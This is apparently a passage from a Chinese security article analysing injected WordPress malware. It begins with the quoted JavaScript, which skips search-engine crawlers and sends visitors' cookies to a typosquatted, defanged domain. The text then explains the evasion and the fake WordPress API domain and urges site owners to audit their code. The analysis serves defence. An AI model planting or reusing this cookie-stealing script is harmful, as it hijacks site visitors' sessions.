var gd = document.cookie.indexOf("_utmzz=");
if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {
var rd = Math.floor(Math.random() * 2);
if (rd == 0) {
var sss = document.createElement('script');
sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);
document.body.appendChild(sss)
}
var dd = new Date();
dd.setTime(dd.getTime() + 86400000);
window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString()
}
}
if (typeof(jQuery) != 'undefined') {
jQuery(function() {
adsadsgg()
})
} else {
window.onload = function() {
adsadsgg()
}
}

在頂部有一個(gè)條件語句,排除了來自搜索引擎爬蟲的用戶代理的Cookies。這確保了發(fā)送給攻擊者的數(shù)據(jù)更有可能立即可用。

在確保數(shù)據(jù)屬于真實(shí)用戶后,腳本收集活動(dòng)Cookie數(shù)據(jù)并將其傳遞給惡意網(wǎng)站,供攻擊者使用。

假冒WordPress API域名

在腳本中,您可能注意到了虛假域名——code.wordprssapi[.]com——那是Cookie數(shù)據(jù)被發(fā)送的地方。

通過購(gòu)買一個(gè)與合法網(wǎng)站平臺(tái)或服務(wù)非常相似的域名,一些網(wǎng)站管理員可能會(huì)在他們的代碼中忽視這一點(diǎn),并假設(shè)它是一個(gè)官方WordPress域名(它不是)。

順便說一下,code.wordpressapi[.]com(正確拼寫)也與WordPress無關(guān)。

結(jié)論

我們已經(jīng)看到過拼寫錯(cuò)誤。它繼續(xù)是一種幫助黑客逃避網(wǎng)站所有者檢測(cè)的策略。這是所有網(wǎng)站管理員在審計(jì)自己的代碼時(shí)應(yīng)該意識(shí)到的事情。要小心,始終檢查域名是否合法,特別是如果它涉及收集或向第三方網(wǎng)站發(fā)送信息。

即使它是一個(gè)官方WordPress域名,發(fā)送Cookies始終是一個(gè)危險(xiǎn)信號(hào)。Cookies包含大量不應(yīng)共享的私人信息。

由于攻擊者越來越擅長(zhǎng)隱藏他們的蹤跡,核心文件完整性檢查或網(wǎng)站監(jiān)控服務(wù)將提醒用戶有關(guān)問題。

更多API相關(guān)內(nèi)容,請(qǐng)查看冪簡(jiǎn)!

上一篇:

針對(duì)API漏洞挖掘技巧學(xué)習(xí)

下一篇:

OAuth和OpenID Connect圖解指南
#你可能也喜歡這些API文章!

我們有何不同?

API服務(wù)商零注冊(cè)

多API并行試用

數(shù)據(jù)驅(qū)動(dòng)選型,提升決策效率

查看全部API→
??

熱門場(chǎng)景實(shí)測(cè),選對(duì)API

#AI文本生成大模型API

對(duì)比大模型API的內(nèi)容創(chuàng)意新穎性、情感共鳴力、商業(yè)轉(zhuǎn)化潛力

25個(gè)渠道
一鍵對(duì)比試用API 限時(shí)免費(fèi)

#AI深度推理大模型API

對(duì)比大模型API的邏輯推理準(zhǔn)確性、分析深度、可視化建議合理性

10個(gè)渠道
一鍵對(duì)比試用API 限時(shí)免費(fèi)